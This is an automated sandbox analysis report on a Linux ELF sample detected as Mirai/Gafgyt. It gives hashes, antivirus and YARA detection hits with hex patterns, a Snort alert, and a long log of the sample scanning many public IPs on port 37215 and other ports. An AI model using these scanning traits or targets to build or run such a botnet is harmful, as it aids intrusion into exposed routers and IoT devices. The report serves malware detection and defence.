Create Interactive Tour

Linux Analysis Report
0lMevtsZn2.elf

Overview

General Information

Sample name:0lMevtsZn2.elf
renamed because original name is a hash value
Original sample name:45d3f64da159abc8f8dac06e3a5d4a59.elf
Analysis ID:1486613
MD5:45d3f64da159abc8f8dac06e3a5d4a59
SHA1:529ca4f5aec4e7dec00f220ab0f20635de96a570
SHA256:0e51e373bf7386947050b1f8637700641766a7870d583856e4e0cf8edc9dde28
Tags:32elfgafgytmipsMirai
Infos:

Detection

Mirai
Score:88
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1486613
Start date and time:2024-08-02 13:16:16 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 24s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:0lMevtsZn2.elf
renamed because original name is a hash value
Original Sample Name:45d3f64da159abc8f8dac06e3a5d4a59.elf
Detection:MAL
Classification:mal88.troj.linELF@0/0@23/0
  • Excluded IPs from analysis (whitelisted): 151.101.194.49, 151.101.2.49, 151.101.66.49, 151.101.130.49
  • Excluded domains from analysis (whitelisted): 14.2.168.192.in-addr.arpa, dualstack.p2.shared.global.fastly.net
  • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: motd.ubuntu.com
Command:/tmp/0lMevtsZn2.elf
PID:5458
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Hello, world!
Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
0lMevtsZn2.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
    0lMevtsZn2.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      0lMevtsZn2.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x26d54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26d68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26d7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26d90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26da4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26db8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26dcc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26de0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26df4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26e08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26e1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26e30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26e44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26e58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26e6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26e80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26e94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26ea8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26ebc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26ed0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x26ee4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      SourceRuleDescriptionAuthorStrings
      5458.1.00007f477c400000.00007f477c42a000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        5458.1.00007f477c400000.00007f477c42a000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5458.1.00007f477c400000.00007f477c42a000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x26d54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26d68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26d7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26d90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26da4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26db8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26dcc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26de0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26df4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26e08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26e1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26e30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26e44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26e58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26e6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26e80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26e94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26ea8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26ebc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26ed0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x26ee4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          5464.1.00007f477c400000.00007f477c42a000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
            5464.1.00007f477c400000.00007f477c42a000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              Click to see the 7 entries
              No Snort rule has matched
              Timestamp:2024-08-02T13:17:08.329974+0200
              SID:2835222
              Source Port:42304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 0lMevtsZn2.elfAvira: detected
              Source: 0lMevtsZn2.elfVirustotal: Detection: 51%Perma Link
              Source: 0lMevtsZn2.elfReversingLabs: Detection: 55%

              Networking

              barindex
              Source: global trafficTCP traffic: 102.110.120.187 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.42.71.8 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.53.112.211 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.154.28.19 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.208.152.146 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.13.159.90 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.239.52.248 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.62.149.83 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.147.4.214 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.44.242.48 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.32.110.177 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.132.149.162 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.233.197.9 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.137.48.248 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.209.25.83 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.79.125.112 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.21.135.34 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.221.51.44 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.98.152.80 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.185.199.91 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.60.41.194 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.230.140.38 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.215.222.195 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.124.30.237 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.242.91.129 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.50.121.172 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.53.111.32 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.21.59.171 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.154.102.15 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.105.94.87 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.219.139.102 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.89.98.64 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.82.45.35 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.194.121.2 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.161.27.62 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.26.168.227 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.49.235.84 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.69.48.177 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.73.65.240 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.248.131.238 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.66.210.139 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.182.157.193 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.120.137.168 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.166.48.21 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.198.137.53 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.21.133.248 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.221.237.228 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.161.224.8 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.218.8.206 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.187.82.224 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.90.233.195 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.24.186.99 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.22.28.226 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.135.10.136 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.40.81.107 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.198.128.79 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.58.204.193 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.211.42.17 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.185.189.52 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.50.110.206 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.150.205.191 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.202.179.221 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.86.125.51 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.92.29.126 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.70.238.248 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.124.128.109 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.26.212.255 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.205.240.40 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.216.15.82 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.126.184.115 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.34.72.173 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.101.25.17 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.195.12.128 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.30.83.61 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.68.151.116 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.32.13.26 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.221.146.195 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.153.231.176 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.191.27.217 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.186.201.201 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.2.236.216 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.50.16.231 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.218.246.109 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.110.95.85 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.181.126.150 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.198.17.230 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.238.251.161 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.189.206.93 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.244.14.145 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.18.210.93 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.120.60.8 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.43.166.208 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.111.211.232 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.154.231.224 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.16.83.255 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.93.99.202 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.136.140.71 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.55.234.242 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.122.12.140 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.93.255.87 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.133.26.101 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.134.224.56 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.173.107.158 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.126.1.250 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.95.101.58 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.188.133.34 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.67.244.22 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.40.221.32 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.203.89.207 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.117.198.37 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.59.78.44 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.112.225.82 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.146.25.235 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.168.52.155 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.197.207.128 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.226.183.187 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.240.12.106 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.52.21.184 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.236.254.52 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.72.54.5 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.151.54.181 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.146.111.131 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.207.55.7 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.208.185.15 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.242.214.145 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.183.133.39 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.190.103.161 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.214.10.229 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.18.188.89 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.13.30.185 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.140.146.178 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.129.76.138 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.58.215.137 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.48.170.226 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.223.19.43 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.35.144.217 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.35.85.145 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.195.219.204 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.2.26.174 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.30.148.226 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.116.122.186 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.105.33.203 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.199.220.146 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.147.28.54 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.211.153.87 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.21.26.13 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.194.57.152 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.89.214.145 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.24.49.213 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.242.207.213 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.229.75.127 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.150.180.137 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.246.74.31 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.53.255.211 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.81.18.255 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.156.185.156 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.30.227.247 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.146.112.89 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.108.240.138 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.125.21.71 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.103.9.72 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.124.243.251 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.255.151.110 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.160.198.16 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.39.153.192 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.11.48.181 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.235.53.56 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.208.147.31 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.59.4.91 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.60.173.65 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.147.250.210 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.252.2.153 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.143.183.218 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.93.50.74 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.35.57.138 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.36.24.177 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.86.28.94 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.210.174.139 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.210.187.120 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.167.108.107 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.78.253.8 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.89.106.180 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.205.36.157 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.202.228.18 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.247.1.64 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.54.128.3 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.234.207.77 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.109.53.120 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.97.53.222 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.254.245.165 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.135.148.163 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.16.235.18 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.202.80.254 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.115.238.165 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.123.228.126 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.248.241.119 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.101.247.168 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.125.44.237 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.223.68.107 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.55.124.150 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.209.70.86 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.59.114.51 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.91.45.163 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.96.44.193 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.231.63.215 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.110.229.200 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.65.206.207 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.167.126.188 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.205.31.27 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.175.248.244 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.175.236.192 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.190.140.15 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.59.181.15 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.86.156.53 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.65.234.216 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.92.241.238 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.252.167.57 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.138.220.187 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.27.189.18 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.135.60.218 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.184.137.28 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.122.161.128 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.0.92.68 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.145.140.45 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.136.80.96 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.142.123.20 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.96.242.195 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.210.107.88 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.94.216.123 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.47.42.255 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.65.120.99 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.234.66.231 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.166.102.65 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.249.192.153 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.190.229.130 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 102.104.197.10 ports 1,2,3,5,7,37215
